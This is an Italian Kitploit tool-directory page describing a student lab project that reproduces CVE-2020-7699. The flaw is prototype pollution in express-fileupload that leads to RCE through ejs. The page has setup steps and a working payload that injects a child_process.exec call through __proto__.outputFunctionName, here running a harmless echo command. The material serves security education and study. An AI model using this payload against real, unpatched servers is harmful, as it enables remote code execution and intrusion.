Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-7699_reproduce — Riproduzione di CVE-2020-7699, progetto principale per il corso di Principi di Sicurezza del Software. | Kitploit
Strumenti/GitHubGitHub/zodiac12-pub/cve-2020-7699_reproduce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneSviluppo PayloadLab e Pratica
GitHubzodiac12-pub/cve-2020-7699_reproduce

CVE-2020-7699_reproduce

Riproduzione di CVE-2020-7699, progetto principale per il corso di Principi di Sicurezza del Software.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
4 anni faNon ancora revisionato

Riproduzione di CVE-2020-7699

Riproduzione della vulnerabilità RCE in Node.js (CVE-2020-7699), mio lavoro di laboratorio

Installazione

Versione Node.js: v14.16.1, assicurati che la versione di Node.js sia 14 (Altre versioni probabilmente funzioneranno, non ho testato)

Versione Python: 3.9.5, Python viene utilizzato solo per inviare richieste HTTP di attacco, nessuna versione specifica richiesta

Basta clone del repository, npm i per installare le dipendenze. Ho offerto 2 comandi aggiuntivi:

  • usando npm run start-server per avviare il server target (server vittima)
  • usando npm run launch-attack per lanciare l'attacco

Analisi

express-fileUpload: le versioni precedenti a 1.1.10 saranno vulnerabili

In express-fileUpload esiste prototype pollution

Vulnerabilità: express-fileUpload prototype pollution

Come sfruttarla: inquinare __proto__.outputFunctionName per scrivere il comando da eseguire. es. echo "ATTACCO RIUSCITO" > attacked.txt

root@kitploit:~
exec_command = "echo \"ATTACCO RIUSCITO\" > attacked.txt"

{
    "__proto__.outputFunctionName": (
        None,
        f"x;process.mainModule.require('child_process').exec('{exec_command}');x"
    )
}

In ejs esiste RCE

Vulnerabilità: ejs proverà ad eseguire xxx.outputFunctionName che è undefined, ma se object.outputFunctionName è inquinato, lo eseguirà invece

Scarica lo strumento